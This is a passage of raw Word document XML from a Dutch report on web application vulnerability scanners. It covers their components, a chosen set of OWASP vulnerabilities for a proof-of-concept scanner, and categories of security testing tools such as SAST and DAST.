              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Beschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="3F4A47B7"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87D3B8" w14:textId="1BE6C67D" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5639DC95" w14:textId="67A3AF45" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D01F38" w14:textId="53AA58D8" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Voor het testen van webapplicaties zal de scanner de communicatie protocollen moeten ondersteunen die gebruikelijk zijn. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="13A72E00"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4730ECF6" w14:textId="2850DB60" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FADFCF1" w14:textId="2ED1F1AB" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Authenticatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CD6BA3" w14:textId="74E0E40F" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">De ondersteuning van authenticatie voor het testen van </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>webapplicaties</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="1F958943"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pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sessie management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC67C25" w14:textId="0946C201" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tijdens een scan is het belangrijk dat er een sessie onderhoudt wordt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="009B5CC9"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66E40A91" w14:textId="32854C9C" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BF7F85" w14:textId="3F9FBB06" w:rsidR="00AF4630" w:rsidRDefault="009559DB" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Spider/Crawler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8BE34A" w14:textId="76BA03E6" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Crawling is een actie die uitgevoerd wordt bij het parsen van een webpagina. Hyperlinks worden verwerkt door de crawler.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="0A341814"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4388A90" w14:textId="661EE622" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634348C2" w14:textId="55763E15" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Parsing(HTML verwerking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274B2E18" w14:textId="374CC669" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Vooraf van het scanproces is het nodig om een de website te verwerken, dit proces wordt door de webcrawler/spider gedaan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="1529D1CA"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47FB10A8" w14:textId="25869752" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8C6414" w14:textId="545E9CE4" w:rsidR="00AF4630" w:rsidRDefault="00C16E00" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Scanner/Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E7F835" w14:textId="11078A41" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Het testen van website op kwetsbaarheden is de </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>kernfunctie van een web</w:t>
            </w:r>
            <w:r>
              <w:t>applicatie scanner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="4C550C3B"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E8A2A0" w14:textId="77572645" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0061DF45" w14:textId="05BAE4D0" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Commando’s en controle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45BF05F9" w14:textId="0A0A62CC" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">De commando’s waarmee de </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>webapplicatie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> scanner wordt aangestuurd. Interactie tussen eindgebruiker en applicatie.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="09B35066"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5DF0EBBE" w14:textId="3605F320" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="271882F2" w14:textId="10B3D4A1" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72643788" w14:textId="2005F8A9" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het genereren van rapporten op basis van de gevonden kwetsbaarheden. De resultaten kunnen dan buiten de interface van de applicatie bekeken worden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DDCBE75" w14:textId="4F1873E8" w:rsidR="0055640C" w:rsidRDefault="00294937" w:rsidP="00C41D9B">
      <w:r>
        <w:t>Tabel 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB59BD" w14:textId="687B6EC4"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5A3E50">
        <w:t>, crawler/s</w:t>
      </w:r>
      <w:r w:rsidR="007B32A3">
        <w:t xml:space="preserve">pider, </w:t>
      </w:r>
      <w:r w:rsidR="005A3E50">
        <w:t>scanner en r</w:t>
      </w:r>
      <w:r w:rsidR="004C504C">
        <w:t>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567B24CE" w14:textId="77777777" w:rsidR="00546B1D" w:rsidRDefault="00546B1D" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3FC807" w14:textId="77777777" w:rsidR="00546B1D" w:rsidRDefault="00546B1D" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E9A28A" w14:textId="77777777" w:rsidR="00546B1D" w:rsidRDefault="00546B1D" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780D547B" w14:textId="77777777" w:rsidR="00546B1D" w:rsidRDefault="00546B1D" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EFDA35" w14:textId="77777777" w:rsidR="00546B1D" w:rsidRDefault="00546B1D" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE04428" w14:textId="16E311C5" w:rsidR="00333E54" w:rsidRDefault="00394B19" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252150784" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="202D6106" wp14:editId="7331380B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3006664</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="467" name="Rectangle 4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5C902" id="Rectangle 467" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-236.7pt;width:25pt;height:1031.7pt;z-index:-25116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jAa5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l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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00333E54" w:rsidRPr="006144BB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5CA4F" w14:textId="380787B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w:t>
      </w:r>
      <w:r w:rsidR="00542A74">
        <w:t>vier</w:t>
      </w:r>
      <w:r w:rsidR="00E0269E">
        <w:t xml:space="preserve"> kw</w:t>
      </w:r>
      <w:r w:rsidR="00092FF1">
        <w:t>etsbaarheden die veelvoorkomend</w:t>
      </w:r>
      <w:r w:rsidR="00E0269E">
        <w:t xml:space="preserve"> zijn en relatief makkelijk te detecteren zijn. </w:t>
      </w:r>
      <w:r w:rsidR="00407DEB">
        <w:t xml:space="preserve">Mijn selectie van kwetsbaarheden bevat </w:t>
      </w:r>
      <w:r w:rsidR="00542A74">
        <w:t>de (A1/WACS-19) SQL injectie,</w:t>
      </w:r>
      <w:r w:rsidR="00407DEB">
        <w:t xml:space="preserve"> (A3/WASC-8)</w:t>
      </w:r>
      <w:r w:rsidR="001C241A">
        <w:t xml:space="preserve"> Cross-site scripting</w:t>
      </w:r>
      <w:r w:rsidR="00542A74">
        <w:t xml:space="preserve"> en Security Misconfiguration </w:t>
      </w:r>
      <w:r w:rsidR="006A38E3">
        <w:t xml:space="preserve">(A5/WACS-13, </w:t>
      </w:r>
      <w:r w:rsidR="00542A74">
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="006A38E3">
        <w:t xml:space="preserve"> en 15</w:t>
      </w:r>
      <w:r w:rsidR="001C241A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00407DEB">
        <w:t xml:space="preserve">. Voor het bewijzen dat </w:t>
      </w:r>
      <w:r w:rsidR="00723CC2">
        <w:t>mijn Proof of Concept werkt behoren</w:t>
      </w:r>
      <w:r w:rsidR="005A09A8">
        <w:t xml:space="preserve"> deze vier</w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00407DEB">
        <w:t>kwetsbaarheden</w:t>
      </w:r>
      <w:r w:rsidR="009610CE">
        <w:t xml:space="preserve"> minimaal bij het testproces</w:t>
      </w:r>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve"> scanner. </w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t xml:space="preserve">Het zijn kwetsbaarheden die vaak door hackers geëxploiteerd worden en hoge schade kunnen </w:t>
      </w:r>
      <w:r w:rsidR="009610CE">
        <w:t>aan</w:t>
      </w:r>
      <w:r w:rsidR="00FD548E">
        <w:t>richten</w:t>
      </w:r>
      <w:r w:rsidR="00061D02">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t xml:space="preserve"> Ook zijn deze </w:t>
      </w:r>
      <w:r w:rsidR="00454253">
        <w:t>drie</w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t xml:space="preserv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44673D">
        <w:t xml:space="preserve"> webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve"> scanner te ontleden zodat ik </w:t>
      </w:r>
      <w:r w:rsidR="00897324">
        <w:t>een overzicht</w:t>
      </w:r>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve"> kon maken van de componenten en processen waaruit </w:t>
      </w:r>
      <w:r w:rsidR="008E6F14">
        <w:t>het systeem in kwestie bestaat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDCCBC" w14:textId="40747EFE" w:rsidR="006144BB" w:rsidRDefault="003E0667" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A938E" w14:textId="1B3E9AA5"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3D5D86F8" w14:textId="3E369C83" w:rsidR="00E920BB" w:rsidRPr="00563708" w:rsidRDefault="00E920BB" w:rsidP="00053609"/>
    <w:p w14:paraId="60373466" w14:textId="4C7A003F" w:rsidR="00F06533" w:rsidRPr="00053609" w:rsidRDefault="00CC56F3" w:rsidP="00053609">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053609">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FD1A7" w14:textId="38D70EE1" w:rsidR="00554FF4" w:rsidRDefault="00394B19" w:rsidP="0013783D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252152832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="050A4D75" wp14:editId="3A99CF02">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3111735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13252873"/>
                <wp:effectExtent l="0" t="0" r="38100" b="31750"/>
                <wp:wrapNone/>
                <wp:docPr id="483" name="Rectangle 483"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="13252873"/>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8E2FC" id="Rectangle 483" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.8pt;margin-top:-244.95pt;width:25pt;height:1043.55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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00534DB4">
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="009A2EB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B9907" w14:textId="290D510F" w:rsidR="004A02C8" w:rsidRPr="0099118F" w:rsidRDefault="005B464A" w:rsidP="005B464A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="0099118F">
        <w:t>Inleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED3AEC" w14:textId="28F50CEE"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9C1CC5">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanners</w:t>
      </w:r>
      <w:r w:rsidR="009B23B8">
        <w:t xml:space="preserve"> onderverdeeld worden in twee hoofdcategorieën </w:t>
      </w:r>
      <w:r w:rsidR="006A55EA">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="000A4F9E">
        <w:t xml:space="preserve">eft betrekking op het testen van </w:t>
      </w:r>
      <w:r w:rsidR="003F5BD4">
        <w:t>kwetsbaarheden in</w:t>
      </w:r>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> de broncode. </w:t>
      </w:r>
      <w:r w:rsidR="00964001">
        <w:t>Vanuit deze twee categorieën hebben organisaties zoals OWASP tools ontwikkeld voor het detecteren van kwetsbaarheden vanuit de buitenkant en bin</w:t>
      </w:r>
      <w:r w:rsidR="00372C39">
        <w:t>nenkant van een web applicatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631E2C8" w14:textId="29652F6B" w:rsidR="00044CDE" w:rsidRDefault="00650BF0" w:rsidP="00554FF4">
      <w:r>
        <w:t>Webapplicatie scanners</w:t>
      </w:r>
      <w:r w:rsidR="00A436F9">
        <w:t xml:space="preserve">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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Threat Modeling Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717280D3" w14:textId="67583E4C" w:rsidR="00D47C6F" w:rsidRPr="0089550C" w:rsidRDefault="00D47C6F" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Source Code Analysis Tools (SAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D60DF6" w14:textId="12F236F5" w:rsidR="00D47C6F" w:rsidRPr="0089550C" w:rsidRDefault="00D47C6F" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Interactive Application Security Testing Tools (IAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19721BEB" w14:textId="7752FA6E" w:rsidR="00D47C6F" w:rsidRDefault="00D47C6F" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Penetration Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B29F4" w14:textId="7FB2F4E6" w:rsidR="004102B3" w:rsidRDefault="00E76C26" w:rsidP="00FA7D89">
      <w:r>
        <w:t>Van de vijf categorieën zal ik er alleen maar één behandelen</w:t>
      </w:r>
      <w:r w:rsidR="00EF4D34">
        <w:t xml:space="preserve"> worden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003443FB">
        <w:t>in dit do</w:t>
      </w:r>
      <w:r w:rsidR="00B84806">
        <w:t>cument en dat</w:t>
      </w:r>
      <w:r w:rsidR="008F4BE2">
        <w:t xml:space="preserve"> is de DAS</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C73654">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00B84806">
        <w:t xml:space="preserve">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BD6245">
        <w:t>ecteert van een web</w:t>
      </w:r>
      <w:r w:rsidR="005D190E">
        <w:t>applicatie en DAS</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C73654">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005D190E">
